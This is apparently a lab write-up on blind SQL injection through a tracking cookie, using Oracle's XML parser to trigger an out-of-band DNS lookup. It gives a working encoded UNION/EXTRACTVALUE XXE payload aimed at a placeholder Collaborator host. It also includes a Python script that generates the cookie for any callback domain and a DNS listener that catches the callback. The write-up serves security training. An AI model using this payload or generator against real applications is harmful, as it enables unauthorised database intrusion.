13. Blind SQL injection with out-of-band interaction

The application's tracking cookie is used in a SQL query that runs asynchronously, so the query's outcome has no effect on the HTTP response: neither an error message nor a time delay can be observed, and there is no in-band way to fingerprint the database type either. The way out is an out-of-band channel. Oracle's XMLType parser, reached through EXTRACTVALUE(), resolves external entities, so an XXE payload inside the injected query makes the database server itself resolve a hostname we control. The resulting DNS lookup proves the injection and, because the payload only works on Oracle (xmltype, EXTRACTVALUE and dual), identifies the backend at the same time; had it not fired, the next step would be to try the equivalent out-of-band payload for each other DBMS in turn. The lab uses Burp Collaborator, which is only available in Burp Suite Professional; on a real engagement you can instead point the payload at a domain whose authoritative DNS server you run and log the incoming queries there. Here's the payload, sent as the value of the TrackingId cookie:


TrackingId=Rr0hDYsZaZYs6nuZ'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--

BURP-COLLABORATOR-SUBDOMAIN is a placeholder for the payload host that Burp Collaborator (or your own DNS zone) hands you. After the server URL-decodes the cookie, the database executes:

' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual--

The quote closes the original string literal, UNION SELECT runs the XXE call, and the trailing -- comments out whatever followed the injection point. Parsing the document declares the parameter entity remote with an external SYSTEM identifier and references it with %remote;, so Oracle's XML parser tries to fetch that URL, which begins with a DNS lookup of the host. The lookup reaches Collaborator even when outbound HTTP from the database server is blocked, which is why the lab only asks for a DNS interaction. The encoding matters because the payload travels in a Cookie header: ; and = are cookie separators, so they become %3b and %3d, ? becomes %3f, the literal % of the entity reference becomes %25 so that the URL decoder restores it, and spaces are sent as +.
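To make the encoding and the capture side concrete, here is an added example (not the lab's or PortSwigger's code) that builds the cookie value from a callback hostname, decodes it back to the SQL the database executes, and parses a DNS query packet the way a self-hosted listener would in order to recognise the callback. The domain example-canary.oastify.com, the build_dns_query helper that stands in for a captured packet, and the listen function are assumptions for illustration.

```python
"""Out-of-band SQL injection via Oracle XXE: build the injected cookie value and
recognise the resulting DNS lookup on a listener you control.
Added example; not code from the lab or from PortSwigger."""
import socket
import struct
from urllib.parse import quote, unquote_plus

# Assumed callback domain: substitute your Burp Collaborator payload host or a
# domain whose authoritative DNS server you operate.
CANARY_DOMAIN = "example-canary.oastify.com"


def xxe_document(callback_host: str) -> str:
    """XML whose DTD declares an external parameter entity and references it.
    Oracle's XMLType parser fetches the entity, which first resolves the host."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://' + callback_host + '/"> %remote;]>'
    )


def injected_sql(callback_host: str) -> str:
    """Cookie value as the database sees it after URL decoding: close the string,
    UNION in the XXE call, comment out the rest of the original query."""
    return (
        "x' UNION SELECT EXTRACTVALUE(xmltype('" + xxe_document(callback_host)
        + "'),'/l') FROM dual--"
    )


def tracking_cookie(callback_host: str) -> str:
    """URL-encode for the Cookie header: ';' and '=' would be read as cookie
    separators, '%' and '?' would be mangled by the URL decoder, spaces become '+'.
    Quotes, brackets and angle brackets are left raw, as in the lab payload."""
    encoded = quote(injected_sql(callback_host), safe="'()/<>[]!\",").replace("%20", "+")
    return "TrackingId=" + encoded


def decode_cookie(cookie: str) -> str:
    """Reverse the encoding to review what will actually reach the SQL engine."""
    return unquote_plus(cookie.split("=", 1)[1])


def build_dns_query(qname: str, txid: int = 0x1234) -> bytes:
    """Constructed stand-in for a captured packet: a minimal DNS A query for qname."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    labels = b"".join(bytes([len(label)]) + label.encode("ascii") for label in qname.split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def parse_qname(packet: bytes) -> str:
    """Extract the name from the first question section of a DNS packet."""
    pos, labels = 12, []
    while True:
        length = packet[pos]
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    return ".".join(labels)


def is_callback(packet: bytes, canary: str = CANARY_DOMAIN) -> bool:
    """True when the query is for the canary zone. Collaborator-style payloads use
    a unique subdomain per probe, so any name under the zone counts."""
    name = parse_qname(packet).lower().rstrip(".")
    return name == canary or name.endswith("." + canary)


def listen(port: int = 53, canary: str = CANARY_DOMAIN) -> None:
    """Minimal self-hosted listener: bind UDP and log every lookup for the canary
    zone. Assumes the zone's NS record delegates to this host. No answer is sent,
    which is enough for a canary because the lookup itself is the signal."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        data, (src, _) = sock.recvfrom(512)
        try:
            if is_callback(data, canary):
                print(f"out-of-band lookup from {src}: {parse_qname(data)}")
        except (ValueError, IndexError):
            continue  # malformed or truncated packet; ignore it


if __name__ == "__main__":
    print(tracking_cookie(CANARY_DOMAIN))
```

Run the script to print the cookie value to paste into the request; run listen() on a host that the canary zone's NS record points at (port 53 needs root) to see the lookup arrive. quote() emits uppercase hex (%3B rather than %3b), which the server's decoder treats identically.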